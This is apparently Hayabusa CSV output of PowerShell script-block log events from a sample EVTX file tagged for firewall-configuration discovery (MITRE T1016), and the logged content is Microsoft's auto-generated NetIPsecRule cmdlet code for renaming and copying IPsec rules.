[Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] 
[Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetConSecRule')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByIPsecRuleName', Mandatory=$true)] [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [Parameter(ParameterSetName='ByQuery', Mandatory=$true)] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter', Mandatory=$true)] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter', Mandatory=$true)] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter', Mandatory=$true)] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter', Mandatory=$true)] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile', Mandatory=$true)] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet', Mandatory=$true)] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet', Mandatory=$true)] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet', Mandatory=$true)] [Parameter(ParameterSetName='GetAll', Mandatory=$true)] [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true)] [string] ${NewName}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] 
[Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [Microsoft.Management",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:05.754 +00:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,".Infrastructure.CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] 
[Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = Microsoft.PowerShell.Utility\New-Object $script:ObjectModelWrapper $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { 
$__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('IPsecRuleName') -and (@('ByIPsecRuleName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${IPsecRuleName}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Enabled') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Enabled}) $__cmdletization_queryBuilder.FilterByProperty('Enabled', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Mode') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Mode}) $__cmdletization_queryBuilder.FilterByProperty('Mode', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('InboundSecurity') -and (@('ByQuery') -contains 
$PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${InboundSecurity}) $__cmdletization_queryBuilder.FilterByProperty('InboundSecurity', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('OutboundSecurity') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${OutboundSecurity}) $__cmdletization_queryBuilder.FilterByProperty('OutboundSecurity', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('QuickModeCryptoSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${QuickModeCryptoSet}) $__cmdletization_queryBuilder.FilterByProperty('QuickModeCryptoSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Phase1AuthSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Phase1AuthSet}) $__cmdletization_queryBuilder.FilterByProperty('Phase1AuthSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Phase2AuthSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Phase2AuthSet}) $__cmdletization_queryBuilder.FilterByProperty('Phase2AuthSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('KeyModule') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${KeyModule}) $__cmdletization_queryBuilder.FilterByProperty('KeyModule', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AllowWatchKey') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${AllowWatchKey}) $__cmdletization_queryBuilder.FilterByProperty('AllowWatchKey', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AllowSetKey') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${AllowSetKey}) 
$__cmdletization_queryBuilder.FilterByProperty('AllowSetKey', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('RemoteTunnelHostname') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${RemoteTunnelHostname}) $__cmdletization_queryBuilder.FilterByProperty('RemoteTunnelEndpointDNSName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('ForwardPathLifetime') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${ForwardPathLifetime}) $__cmdletization_queryBuilder.FilterByProperty('MaxReturnPathLifetimeSeconds', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('EncryptedTunnelBypass') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${EncryptedTunnelBypass}) $__cmdletization_queryBuilder.FilterByProperty('BypassTunnelIfEncrypted', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('RequireAuthorization') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${RequireAuthorization}) $__cmdletization_queryBuilder.FilterByProperty('RequireAuthorization', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('User') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${User}) $__cmdletization_queryBuilder.FilterByProperty('Users', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Machine') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Machine}) $__cmdletization_queryBuilder.FilterByProperty('Machines', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) 
$__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallAddressFilter') -and (@('ByAssociatedNetFirewallAddressFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallAddressFilter}, 'MSFT_NetConSecRuleFilterByAddress', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallInterfaceFilter') -and (@('ByAssociatedNetFirewallInterfaceFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallInterfaceFilter}, 'MSFT_NetConSecRuleFilterByInterface', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallInterfaceTypeFilter') -and (@('ByAssociatedNetFirewallInterfaceTypeFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallInterfaceTypeFilter}, 'MSFT_NetConSecRuleFilterByInterfaceType', 'PartComponent', 'GroupComponent', 'Default') } if 
($PSBoundParameters.ContainsKey('AssociatedNetFirewallPortFilter') -and (@('ByAssociatedNetFirewallPortFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallPortFilter}, 'MSFT_NetConSecRuleFilterByProtocolPort', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallProfile') -and (@('ByAssociatedNetFirewallProfile') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallProfile}, 'MSFT_NetConSecRuleInProfile', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecPhase2AuthSet') -and (@('ByAssociatedNetIPsecPhase2AuthSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecPhase2AuthSet}, 'MSFT_NetConSecRuleEMAuthSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecPhase1AuthSet') -and (@('ByAssociatedNetIPsecPhase1AuthSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecPhase1AuthSet}, 'MSFT_NetConSecRuleMMAuthSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecQuickModeCryptoSet') -and (@('ByAssociatedNetIPsecQuickModeCryptoSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecQuickModeCryptoSet}, 'MSFT_NetConSecRuleQMCryptoSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByIPsecRuleName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 
'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase2AuthSet', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecQuickModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByIPsecRuleName', 'ByDisplayName",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:05.754 +00:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase2AuthSet', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecQuickModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByIPsecRuleName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase2AuthSet', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecQuickModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_methodParameters = Microsoft.PowerShell.Utility\New-Object 
System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter] switch -exact ($PSCmdlet.ParameterSetName) { { @('ByIPsecRuleName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase2AuthSet', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecQuickModeCryptoSet', 'GetAll', 'InputObject (cdxml)') -contains $_ } { [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewName')) { [object]$__cmdletization_value = ${NewName} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'NewName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'NewName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{ Name = 'ReturnValue'; ParameterType = 'System.Int32'; Bindings = 'Error'; Value = $null; IsValuePresent = $false } $__cmdletization_methodInvocationInfo = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodInvocationInfo @('Rename', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach 
($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecRule.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Rename-NetIPsecRule' function Copy-NetIPsecRule { [CmdletBinding(DefaultParameterSetName='GetAll', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetConSecRule')] param( [Parameter(ParameterSetName='ByIPsecRuleName', Mandatory=$true, Position=0, ValueFromPipelineByPropertyName=$true)] [Alias('ID','Name')] [ValidateNotNull()] [string[]] ${IPsecRuleName}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled[]] ${Enabled}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.IPsecMode[]] ${Mode}, [Parameter(ParameterSetName='ByQuery')] [Alias('SecIn')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.SecurityPolicy[]] 
${InboundSecurity}, [Parameter(ParameterSetName='ByQuery')] [Alias('SecOut')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.SecurityPolicy[]] ${OutboundSecurity}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${QuickModeCryptoSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Phase1AuthSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Phase2AuthSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.KeyModule[]] ${KeyModule}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${AllowWatchKey}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${AllowSetKey}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${RemoteTunnelHostname}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [uint32[]] ${ForwardPathLifetime}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${EncryptedTunnelBypass}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${RequireAuthorization}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${User}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Machine}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter', Mandatory=$true, ValueFromPipeline=$true)] 
[PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetAddressFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallAddressFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetInterfaceFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallInterfaceFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetInterfaceTypeFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallInterfaceTypeFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetProtocolPortFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallPortFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallProfile')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallProfile}, [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEP2AuthSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecPhase2AuthSet}, [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEP1AuthSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecPhase1AuthSet}, [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet', Mandatory=$true, 
ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEQMCryptoSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecQuickModeCryptoSet}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByIPsecRuleName')] 